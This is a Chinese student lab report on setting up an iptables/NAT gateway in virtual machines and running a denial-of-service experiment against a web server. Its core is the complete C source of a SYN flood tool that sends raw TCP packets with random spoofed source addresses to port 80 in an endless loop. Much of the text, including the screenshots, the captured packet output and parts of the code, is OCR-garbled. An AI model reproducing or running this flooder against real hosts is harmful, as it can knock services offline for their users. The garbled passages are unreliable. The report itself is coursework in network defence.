linux防火墻配置實(shí)驗(yàn)

單個(gè)IP地址建立連接和DOS攻擊

實(shí)驗(yàn)第九組2017.05.19單個(gè)IP地址限制連接實(shí)驗(yàn)原理：防火墻在做信息包過(guò)濾決定時(shí)，有一套遵循和組成的規(guī)則，這些規(guī)則存儲(chǔ)在專(zhuān)用的信息包過(guò)濾表中，而這些表集成在Linux內(nèi)核中。在信息包過(guò)濾表中，規(guī)則被分組放在我們所謂的鏈(chain)中。而netfilter/iptablesIP信息包過(guò)濾系統(tǒng)是一款功能強(qiáng)大的工具，可用于添加、編輯和移除規(guī)則。netfilter組件也稱(chēng)為內(nèi)核空間(kernelspace)，是內(nèi)核的一部分，由一些信息包過(guò)濾表組成，這些表包含內(nèi)核用來(lái)控制信息包過(guò)濾處理的規(guī)則集。iptables組件是一種工具，也稱(chēng)為用戶(hù)空間（userspace）,它使插入、修改和除去信息包過(guò)濾表中的規(guī)則變得容易。實(shí)驗(yàn)環(huán)境攻擊者win764位ip:172.16.9.1,被攻擊者虛擬機(jī)vm構(gòu)造，與宿主機(jī)采用橋接，在同一網(wǎng)段，ip為1.1.1.2實(shí)驗(yàn)?zāi)康模和ㄟ^(guò)Vmware虛擬機(jī)，配置網(wǎng)關(guān)，以及模擬外網(wǎng)，內(nèi)網(wǎng)，Web服務(wù)器。通過(guò)外網(wǎng)來(lái)進(jìn)行DOS攻擊，通過(guò)在被攻擊的主機(jī)上抓包可以清楚地看到整個(gè)攻擊過(guò)程，并且在網(wǎng)關(guān)上設(shè)置了NAT地址轉(zhuǎn)換，在訪問(wèn)外網(wǎng)時(shí)將內(nèi)網(wǎng)地址轉(zhuǎn)換成公網(wǎng)地址（SNAT），以及外網(wǎng)訪問(wèn)內(nèi)網(wǎng)時(shí)將公網(wǎng)地址轉(zhuǎn)換成內(nèi)網(wǎng)地址（DNAT）。并且可以在網(wǎng)關(guān)上設(shè)置上網(wǎng)時(shí)間，限制某些應(yīng)用訪問(wèn)Internet等。實(shí)驗(yàn)拓?fù)洌簩?shí)驗(yàn)步驟:搭建實(shí)驗(yàn)環(huán)境（Vmware虛擬機(jī)作為平臺(tái)），按照邏輯拓?fù)鋱D進(jìn)行連接。配置網(wǎng)關(guān)1） 配置三塊網(wǎng)卡，分別是eth0，ethl，eth2，全部設(shè)置為橋接模式。2） Ethlip地址192.168.9.1，eth2ip地址192.168.19.1，eth0ip地址1.1.9.13） 使用命令echo"1”>/proc/sys/net/ipv4/ip_forward，打開(kāi)路由功能4） 使用命令/etc/init.d/iptablesstop。關(guān)閉防火墻。5） 制定NAT轉(zhuǎn)化策略，建議當(dāng)?shù)讓泳W(wǎng)絡(luò)全部通時(shí)再測(cè)試NAT。[rooWlyhUifconfigethlIf216E.9.1retmask255.25r.2E5.0I[rooWlyh ifcon-igethiL&2.16：,1；,1netnask25E」）[rooWlyhifcon-igeth：1.1F.1netmask255 25E.D[rooWlyh京回工[配置主機(jī)（包括web服務(wù)器，外網(wǎng)主機(jī)）1）配置一塊網(wǎng)卡eth0添加ip地址,模式為橋接。2）增加各自的默認(rèn)網(wǎng)關(guān)。3）關(guān)閉本地防火墻。調(diào)試dos攻擊程序，在模擬外網(wǎng)的pc上編譯執(zhí)行，在web服務(wù)器上抓包觀察。觀察NAT轉(zhuǎn)化是否實(shí)現(xiàn)實(shí)驗(yàn)截圖：將網(wǎng)卡配置為橋接模式。

設(shè)腎ai設(shè)腎ai田存16B口嵯120GBCDJDVD(ID日正在使用文住F?.lSO\CentO5-6J->...田臉醐丞植舞式甄〕蜃南邸懇2橋牒點(diǎn)自珈陶磷逾垮3館瞬由自如Busa^存在腕姻麒更眼噂內(nèi)犧，內(nèi)存扣Ivm目M0此酬機(jī)的內(nèi)削—1。網(wǎng)目MB□4GE32GE16GE驗(yàn)證網(wǎng)絡(luò)的連通性。[rooWlyh桌面]#pirg1.1.9.1PING1,1,￡,1(1,1,9,1)646464646464丫bytesbytesbytesbytesbytesbytesfroilfroil仃驗(yàn)證網(wǎng)絡(luò)的連通性。[rooWlyh桌面]#pirg1.1.9.1PING1,1,￡,1(1,1,9,1)646464646464丫bytesbytesbytesbytesbytesbytesfroilfroil仃onIronfromfror1.1.9.1；1.1.9.1：1.1.9.1：1.1.9.1：1,1,9,1：1,1,9,1；56(84)bytesofttl=E4ttl=64ttl=64ttl=64tt>64ttl=64ionp_seq=lionp_seq=2icmp_seq=3ionp_seq=4ionp_5eq=5ionp_seq=Gdata.time=9.99mstime=0.059time=0.050time=0.04Etime=0,052time=0,045[ISnsnsH5[15OKpacketloss,time5G54ns

ms1.19.1OKpacketloss,time5G54ns

ms6packetstransmitted,6received,rttmin/avg/nax/mdev=0.045/1.708/3.990/3.703查看服務(wù)器的連通性。-□fdata.time=0.056time=0,053time=0.055time=0.□fdata.time=0.056time=0,053time=0.055time=0.045msmismismsPING192.168.19.1(192.168.19.1)56(84)bytes64bytesfrom192.168.19.1:icmp_seq=lttl=6464bytesfrom192,168,19,1;icmp_seq=2ttl=6464bytesfrom192.168.19.1;icmp_seq=3ttl=6464bytesfrom192.168.19.1：icmp_seq=4ttl=64---192.168.19.1pingstatistics--4packetstransmitted,4received,OKpacketloss,time3872msrttmin/avg/max/mdev=0.045/0.052/0.0^6/0.006mis

D1叩.并麻溺朋卜京，K「廄叩TrnI偵iitestKoDOS攻擊實(shí)驗(yàn)原理拒絕服務(wù)攻擊是一種非常有效的攻擊技術(shù)，它利用協(xié)議或系統(tǒng)的缺陷，采用欺騙的策略進(jìn)行網(wǎng)絡(luò)攻擊，最終目的是使目標(biāo)主機(jī)因?yàn)橘Y源全部被占用而不能處理合法用戶(hù)提出的請(qǐng)求，即對(duì)外表現(xiàn)為拒絕提供服務(wù)。dos攻擊dos攻擊在眾多網(wǎng)絡(luò)攻擊技術(shù)中是一種簡(jiǎn)單有效并且具有很大危害性的攻擊方法。它通過(guò)各種手段消耗網(wǎng)絡(luò)帶寬和系統(tǒng)資源，或者攻擊系統(tǒng)缺陷，使系統(tǒng)的正常服務(wù)陷于癱瘓狀態(tài)，不能對(duì)正常用戶(hù)進(jìn)行服務(wù)，從而實(shí)現(xiàn)拒絕正常用戶(hù)的訪問(wèn)服務(wù)。ddos攻擊ddos攻擊是基于dos攻擊的一種特殊形式。攻擊者將多臺(tái)受控制的計(jì)算機(jī)聯(lián)合起來(lái)向目標(biāo)計(jì)算機(jī)發(fā)起dos攻擊，它是一種大規(guī)模協(xié)作的攻擊方式，主要瞄準(zhǔn)比較大的商業(yè)站點(diǎn)，具有較大的破壞性。ddos攻擊由攻擊者、主控端和代理端組成。攻擊者是整個(gè)ddos攻擊發(fā)起的源頭，它事先已經(jīng)取得了多臺(tái)主控端計(jì)算機(jī)的控制權(quán)，主控端極端基分別控制著多臺(tái)代理端計(jì)算機(jī)。在主控端計(jì)算機(jī)上運(yùn)行著特殊的控制進(jìn)程，可以接受攻擊者發(fā)來(lái)的控制指令，操作代理端計(jì)算機(jī)對(duì)目標(biāo)計(jì)算機(jī)發(fā)起ddos攻擊。ddos攻擊之前，首先掃描并入侵有安全漏洞的計(jì)算機(jī)并取得其控制權(quán)，然后在每臺(tái)被入侵的計(jì)算機(jī)中安裝具有攻擊功能的遠(yuǎn)程遙控程序，用于等待攻擊者發(fā)出的入侵命令。這些工作是自動(dòng)、高速完成的，完成后攻擊者會(huì)消除它的入侵痕跡，使系統(tǒng)的正常用戶(hù)一般不會(huì)有所察覺(jué)。攻擊者之后會(huì)繼續(xù)利用已控制的計(jì)算機(jī)掃描和入侵更多的計(jì)算機(jī)。重復(fù)執(zhí)行以上步驟，將會(huì)控制越來(lái)越多的計(jì)算機(jī)。典型的DOS攻擊：死亡之pingICMPSmurfLand攻擊Teardrop攻擊SYNfloodUDPFloodDdos?電子郵件炸彈程序代碼:#include<netinet/in.h>voidsend_tcp(intsockfd,structsockaddr_in*addr);unsignedshortcheck_sum(unsignedshort*addr,intlen);#include<netinet/ip.h>#include<netinet/tcp.h>#include<string.h>#include<stdlib.h>#include<netinet/in.h>#include<sys/socket.h>#include<sys/types.h>#defineLOCALPORT8888#include"mdos.h"#include<string.h>#include<netinet/in.h>//forhtnos#include<stdio.h>#include<netdb.h>#include<sys/socket.h>//forsetuid#include<unistd.h>#include<arpa/inet.h>#include<stdlib.h>#include<errno.h>#defineDESTPORT80/*要攻擊的端口(WEB)*///#defineLOCALPORT8888intmain(intargc,char**argv)(intsockfd;structsockaddr_inaddr;inton=1;if(argc!=2)(fprintf(stderr,"Usage:%sip",argv[0]);exit(1);}bzero(&addr,sizeof(structsockaddr_in));addr.sin_family=AF_INET;addr.sin_port=htons(DESTPORT);/*看成是獲取你要ping的目標(biāo)的網(wǎng)絡(luò)地址,argv[1^ip的話直接aton,是域名的話就要gethostbyname了*/unsignedlonglip;lip=inet_addr(argv[1]);memcpy(&(addr.sin_addr),&lip,4);/****使用IPPROTO_TCP創(chuàng)建一個(gè)TCP的原始套接字****/sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);

if(sockfd<0)(fprintf(stderr,"SocketError:%sna",strerror(errno));exit(1);}/********設(shè)置IP數(shù)據(jù)包格式，告訴系統(tǒng)內(nèi)核模塊IP數(shù)據(jù)包由我們自己來(lái)填寫(xiě)***/setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));/****沒(méi)有辦法，只用超級(jí)護(hù)用戶(hù)才可以使用原始套接字*********/setuid(getpid());/*********發(fā)送炸彈了/*********發(fā)送炸彈了!!!！****/send_tcp(sockfd,&addr);}voidsend_tcp(intsockfd,structsockaddr_in*addr)(charbuffer[100];/****用來(lái)放置我們的數(shù)據(jù)包****/structip*ip;structtcphdr*tcp;inthead_len;/*******我們的數(shù)據(jù)包實(shí)際上沒(méi)有任何內(nèi)容，所以長(zhǎng)度就是兩個(gè)結(jié)構(gòu)的長(zhǎng)度***/head_len=sizeof(structip)+sizeof(structtcphdr);bzero(buffer,100);/********填充IP數(shù)據(jù)包的頭部，還記得IP的頭格式嗎？******/ip=(structip*)buffer;

ip->ip_v=IPVERSION;/**版本一般的是4**/ip->ip_hl=sizeof(structip)>>2;/**IP數(shù)據(jù)包的頭部長(zhǎng)度**/ip->ip_tos=0;/**服務(wù)類(lèi)型**/ip->ip_len=htons(head_len);/**IP數(shù)據(jù)包的長(zhǎng)度**/ip->ip_id=0;/**讓系統(tǒng)去填寫(xiě)吧**/ip->ip_off=0;/**和上面一樣，省點(diǎn)時(shí)間**/ip->ip_ttl=MAXTTL;/**最長(zhǎng)的時(shí)間255**/ip->ip_p=IPPROTO_TCP;/**我們要發(fā)的是TCP包**/ip->ip_sum=0;/**校驗(yàn)和讓系統(tǒng)去做**/ip->ip_dst=addr->sin_addr;/**我們攻擊的對(duì)象**//*******開(kāi)始填寫(xiě)/*******開(kāi)始填寫(xiě)TCP數(shù)據(jù)包*****/tcp=(structtcphdr*)(buffer+sizeof(structip));tcp->source=htons(LOCALPORT);tcp->dest=addr->sin_port;/**目的端口**/tcp->seq=random();tcp->ack_seq=0;tcp->doff=5;tcp->syn=1;/**我要建立連接**/tcp->check=0;/**好了，一切都準(zhǔn)備好了.服務(wù)器,你準(zhǔn)備好了沒(méi)有？？A_A**/while(1)(/**你不知道我是從那里來(lái)的,慢慢的去等吧！**/ip->ip_src.s_addr=random();/**什么都讓系統(tǒng)做了，也沒(méi)有多大的意思，還是讓我們自己來(lái)校驗(yàn)頭部吧*/tcp->check=check_sum((unsignedshort*)tcp,\sizeof(structtcphdr));sendto(sockfd,buffer,head_len,0,(structsockaddr*)addr,\sizeof(structsockaddr_in));}}/*下面是首部校驗(yàn)和的算法*/unsignedshortcheck_sum(unsignedshort*addr,intlen)(registerintnleft=len;registerintsum=0;short*w=(short*)addr;shortanswer=0;while(nleft>1)(sum+=*w++;nleft-=2;}if(nleft==1)(*(unsignedchar*)(&answer)=*(unsignedchar*)w;sum+=answer;

sum=(sum>>16)+(sum&0xffff);sum+=(sum>>16);answer=~sum;return(answer);}實(shí)驗(yàn)驗(yàn)證：DOS攻擊驗(yàn)證:SlMMWraU7.2J.1.7117L2L4M-P4Ql UXh-ng-i機(jī)?S4.□皿MOD JTJ.2L1.71173.21-4DJUI：”Ml匚吐」.W.hjjinmhdbh加jr〔um「州Lhjbh：172.22.J.71】；*flilajrccpan:捆Wdbh1"iilonpaminTwc^icSlMMWraU7.2J.1.7117L2L4M-P4Ql UXh-ng-i機(jī)?S4.□皿MOD JTJ.2L1.71173.21-4DJUI：”Ml匚吐」.W.hjjinmhdbh加jr〔um「州Lhjbh：172.22.J.71】；*flilajrccpan:捆Wdbh1"iilonpaminTwc^ic204.tiW-33DW172.32.4L1￡4Z34.Cii+lOiQCiaF2.2i.l.rl17LK■瀏Jfri17L22.171ULgLIMT7?-??■}.7172.E_4D.lfi4iHFJLWJCPK?"?】：JirwuimkY「「w，;hFJ1LuctrlnailDnirrcajchablc(potunrc3￡hd?lE)mGcurteport:3岫’DE^tiMbtiaiparrEiv?即!e23Sourcepon:itHJEDcnirinlixipr::ocrl^syicMLOiLiridlilin”「3己1的kpBL叩「加山電上4#和7土叵I.'甌艮嘆匚HF叩流卻Aki：切如一E22.的」取官Cls'dlr^lINniiw 分urs:Js-H^entvtord皿呻Ihfs17.Ltt4fl74ftCn17?.??.1.711脾 K「T!；翻/n^^TlMiTfM !MNVM仰f B34.(142UIO1TE.2L*.71LDcrinoidDnjrrcactiiibk(?crcunrcachitlE' 1I.7LB.1.71IILiw-：1rr.jma^habk(wr 出Ml，：pjr.;MM.tMMMD 173.M-.J*.1￡4快二￡春臼Jjp。仙飛『小對(duì),jateja傳!0i叮JxbjTsmiys^Hi啪皿173.2J.1.71524.￡?7?。2,心.49.1叫172.￡.J.?1"?JlLZmadmjma/chablE(Foit524.￡?7?。2,心.49.1叫172.￡.J.?1"?JlLZmadmjma/chablE(Foit叩「r叫h由n].tS5fl71000172.2LJ.711叫.22.明.俶fljguilkpuit：詢(xún)31n蛀LiuLiunpjr.：如U.哭MilLU4.HTr-nCi3m.27.44.Il